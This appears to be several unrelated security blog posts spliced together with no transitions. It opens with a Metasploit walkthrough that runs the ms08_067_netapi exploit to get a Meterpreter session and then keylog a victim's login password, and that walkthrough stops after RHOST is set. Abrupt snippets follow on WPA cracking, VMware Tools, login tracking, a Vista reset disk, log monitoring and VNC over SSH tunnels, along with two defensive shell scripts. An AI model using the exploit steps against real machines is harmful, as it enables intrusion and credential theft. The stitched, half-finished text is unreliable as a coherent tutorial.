So you got a Meterpreter session on a remote client, and now you want to get password hashes; but sometimes you can’t use “hashdump” from Meterpreter, especially if your session is not running as a user with admin privileges. So how could you get the remote user’s password? Well, Metasploit has a script called “keylogrecorder,” which has an option to log off the user and record his login password. Note that for this to work, you need to migrate your process to “winlogon.exe.”
STEPS:
1- Ok, the first thing is to get a Meterpreter session going. For this we’ll use a “netapi” exploit.
msf > search netapi
[*] Searching loaded modules for pattern 'netapi'...

Exploits
========

   Name                          Rank    Description
   ----                          ----    -----------
   windows/smb/ms03_049_netapi   good    Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/ms06_040_netapi   great   Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/ms06_070_wkssvc   normal  Microsoft Workstation Service NetpManageIPCConnect Overflow
   windows/smb/ms08_067_netapi   great   Microsoft Server Service Relative Path Stack Corruption

msf> use exploit/windows/smb/ms08_067_netapi
2- Now we need to set the options for this exploit.
msf exploit(ms08_067_netapi)> show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi)> set RHOST 172.16.10.105
RHOST => 172.16.10.105
Ok, the previous video was kind of outdated, so I posted a new one. Credits to g0tmi1k. This video goes beyond just cracking WPA; it also shows how the different tools perform, and it explains the methodology really simply. Let me say that cracking WPA is not like cracking WEP: with WEP you’re exploiting a vulnerability in the way the encryption algorithm is implemented, but with WPA the only vulnerability will be the strength of the user’s passphrase. Yes, you’ve guessed it: when cracking WPA, basically what you’re doing is brute-forcing the user’s password; in other words, the success of your attack will depend on your dictionary or password list. If the user’s passphrase is not in your dictionary, you will never crack the WPA key. There are several types of WPA dictionary lists out there, but I highly recommend using rainbow tables, which can be several gigs in size. How to find them?… Google is your friend!
If you’re like me and test pretty much any OS and app in some sort of virtual environment (in my case I use VMware Workstation), then when you decide to test BackTrack 4 Final you will need to install the VMware Tools. Here I go over the commands needed to install them.
1- First go to VM -> Install VMware Tools (the figure shows “Reinstall VMware Tools” because I had previously installed it, but yours should say “Install”).
After you have created user accounts and let those users loose on your computer, there are different commands you can use to keep track of how they are using it. There are commands for checking such things as who is logged into your system and for getting general information about the users with accounts on your system. Here are some of these commands.
last #list the most recent successful logins
root@ubuntu-box:~# last -a
smbuser  pts/2        Fri Sep 25 06:37   still logged in    windows-box
jorge    pts/1        Fri Sep 25 06:35   still logged in    windows-box
jorge    pts/1        Fri Sep 25 06:34 - 06:35  (00:00)     windows-box

wtmp begins Fri Sep 25 06:34:52 2009
lastb #List the most recent unsuccessful logins
root@ubuntu-vbox:~# lastb
smbuser  ssh:notty    windows-box      Fri Sep 25 05:36 - 05:36  (00:00)
jorge    :0                            Fri Sep 18 17:28 - 17:28  (00:00)
jorge    :0                            Fri Sep 18 17:28 - 17:28  (00:00)
jorge    :0                            Fri Sep 18 17:27 - 17:27  (00:00)
jorge    :0                            Fri Sep 18 17:27 - 17:27  (00:00)
jorge    :0                            Fri Sep 18 17:27 - 17:27  (00:00)
who -u #List who is currently logged in (long form)
Windows Vista contains a handy hint mechanism for helping you recall your password if you’ve forgotten it. But what if you’ve completely forgotten both your password and the meaning of the hint? In that situation your work and email will be locked inside your computer (well, ok, probably your administrator could recover it for you or reset your password). Fortunately, Windows Vista still offers a solution to this problem. Note that this only works if you prepare it before you actually forget your password; in other words, you have to make the disk while you still have access to your computer. Vista will save your password to a USB disk or CD that you insert in case you forget your password. Should I mention that you should put this key in a safe place! Although the key is not stored in clear text on your CD or USB key, it can be read by someone with some serious know-how.
To create this disk:
Sometimes you need to keep a close watch on a machine that has been compromised; therefore, you might want to see the logs in real time. Well, “tail” allows you to watch the logs in real time. Most system-related messages are logged to the “messages” log file, and security-related messages are sent to the “secure” log file. In the latter you can find successful and unsuccessful login attempts. So the “secure” log file is a good place to start when you are trying to identify whether someone has tried to break into that box.
tail -f /var/log/secure
or
tail -f /var/log/messages
Now you can try logging in from a remote box or locally and watch the logs scroll by in real time. These are some log files that might be of interest.
tail -f /var/log/secure #security related messages
tail -f /var/log/messages #system messages
tail -f /var/log/maillog #mail server messages
tail -f /var/log/httpd/access_log #web server messages
Moreover, the “grep” command can be quite useful for parsing through log files. In this case, the grep command is used to search the “secure” log file for the string “smbuser.” The -R switch makes grep search recursively through directories (it has no effect on a single file like this one), and the -n switch displays the line number of each match.
[root@Fedora11-vbox ~]# grep -Rn smbuser /var/log/secure
81:Sep 26 11:55:04 Fedora11-vbox useradd[2233]: new group: name=smbuser, GID=501
82:Sep 26 11:55:04 Fedora11-vbox useradd[2233]: new user: name=smbuser, UID=501, GID=501, home=/home/smbuser, shell=/bin/bash
83:Sep 26 11:55:26 Fedora11-vbox passwd: pam_unix(passwd:chauthtok): password changed for smbuser
85:Sep 26 12:00:37 Fedora11-vbox passwd: pam_unix(passwd:chauthtok): password changed for smbuser
The “grep” command can also be used to search multiple files recursively. This command searches in the “/etc/httpd/conf” and “/etc/httpd/conf.d” directories for the string “VirtualHost.”
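The tail and grep commands above show the raw “secure” log; the thing a defender actually wants from it (and from the lastb listing earlier) is a count of failed logins per source and of successful logins per user, so that a burst of failures from one address stands out. The following shell script is an added example, not code from the original post: it embeds a few constructed sshd log lines (hostnames, users and addresses are made up) and summarizes them with the same grep/sed/sort/uniq tools, reading from stdin so it can be pointed at a real file with “< /var/log/secure”.

```shell
#!/bin/sh
# Added example (not from the original post): summarize SSH login activity
# from "secure"-style log lines. The SAMPLE_LOG below is constructed for the
# demo; the hostnames, users and addresses are made up.

SAMPLE_LOG='Sep 26 12:01:02 Fedora11-vbox sshd[2310]: Failed password for invalid user admin from 192.0.2.10 port 51022 ssh2
Sep 26 12:01:05 Fedora11-vbox sshd[2312]: Failed password for invalid user admin from 192.0.2.10 port 51023 ssh2
Sep 26 12:01:09 Fedora11-vbox sshd[2314]: Failed password for root from 192.0.2.10 port 51024 ssh2
Sep 26 12:02:30 Fedora11-vbox sshd[2320]: Accepted password for jorge from 192.0.2.25 port 40110 ssh2
Sep 26 12:03:41 Fedora11-vbox sshd[2330]: Failed password for jorge from 192.0.2.25 port 40111 ssh2
Sep 26 12:05:00 Fedora11-vbox useradd[2340]: new user: name=smbuser, UID=501, GID=501, home=/home/smbuser, shell=/bin/bash'

# count_failed_by_source: print "<count> <source-ip>" for every source that
# produced a "Failed password" line, most failures first. Reads log text from
# stdin, so it works on a file ("< /var/log/secure") or on a pipe.
count_failed_by_source() {
    grep 'sshd\[[0-9]*]: Failed password' |
    sed -n 's/.* from \([0-9.]*\) port .*/\1/p' |
    sort | uniq -c | sort -rn |
    awk '{ print $1, $2 }'
}

# count_accepted_by_user: print "<count> <user>" for successful logins.
count_accepted_by_user() {
    grep 'sshd\[[0-9]*]: Accepted ' |
    sed -n 's/.* Accepted [a-z]* for \([^ ]*\) from .*/\1/p' |
    sort | uniq -c | sort -rn |
    awk '{ print $1, $2 }'
}

# flag_sources THRESHOLD: print only the source IPs whose failure count
# reaches THRESHOLD; the candidates for a closer look (or a firewall rule).
flag_sources() {
    threshold="$1"
    count_failed_by_source | awk -v t="$threshold" '$1 >= t { print $2 }'
}

# Demo on the constructed sample. On a live box:  flag_sources 5 < /var/log/secure
printf '%s\n' "$SAMPLE_LOG" | count_failed_by_source
```

The functions only match lines that sshd itself wrote (the "sshd[pid]:" prefix), so useradd or passwd entries in the same file, like the ones in the grep output above, are ignored rather than miscounted.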
VNC is considered to be an insecure protocol. The password is sent using fairly weak encryption, and the rest of the session is not encrypted at all. For that reason, when using VNC over an untrusted network or the internet, I recommend you tunnel it over SSH.
To forward VNC port 5900 on localhost to port 5900 on the remote host (the local end listens on 5900 and SSH carries the traffic to localhost:5900 on vncserver):
ssh -L 5900:localhost:5900 vncserver
If your SSH server is listening on another port, like 222:
ssh -L 5900:localhost:5900 vncserver -p 222
The same procedure can be done on a window$ machine using PuTTY.
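The tunnel only helps if the VNC server on the remote box is not also reachable directly, so after setting it up it is worth checking that every VNC display port (5900-5999) is bound to the loopback address only. The script below is an added example, not from the original post: it parses listener lines in the format of “ss -ltn” output (the sample table is constructed, not captured from a real host) and reports any VNC listener bound to a non-loopback address.

```shell
#!/bin/sh
# Added example (not from the original post): verify that VNC listeners on a
# host are loopback-only, so an SSH tunnel is the only way in. SAMPLE_SS is a
# constructed listener table in the layout of "ss -ltn"; against a real host
# run:  ss -ltn | vnc_exposed

SAMPLE_SS='State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       5       127.0.0.1:5901       0.0.0.0:*
LISTEN  0       5       0.0.0.0:5900         0.0.0.0:*
LISTEN  0       5       [::]:5902            [::]:*
LISTEN  0       128     127.0.0.1:631        0.0.0.0:*'

# vnc_exposed: read "ss -ltn"-style lines on stdin and print "<addr>:<port>"
# for every VNC display port (5900-5999) bound to something other than the
# loopback address. Prints nothing when all VNC listeners are loopback-only.
vnc_exposed() {
    awk '
        $1 == "LISTEN" {
            n = split($4, parts, ":")                       # port is the last ":" field
            port = parts[n] + 0                             # "*" becomes 0 and is skipped
            addr = substr($4, 1, length($4) - length(parts[n]) - 1)
            if (port < 5900 || port > 5999) next
            if (addr == "127.0.0.1" || addr == "[::1]" || addr == "::1") next
            print $4
        }'
}

# vnc_ok: exit status 0 when no VNC port is exposed, 1 otherwise, so it can
# sit in a hardening script:  ss -ltn | vnc_ok || echo "WARNING: VNC exposed"
vnc_ok() {
    [ -z "$(vnc_exposed)" ]
}

# Demo on the constructed sample: reports 0.0.0.0:5900 and [::]:5902,
# while the loopback-only 127.0.0.1:5901 display passes.
printf '%s\n' "$SAMPLE_SS" | vnc_exposed
```

Binding the VNC server to 127.0.0.1 (most servers have a localhost-only option) is what makes the ssh -L tunnel the single entry point; this check confirms that binding rather than assuming it.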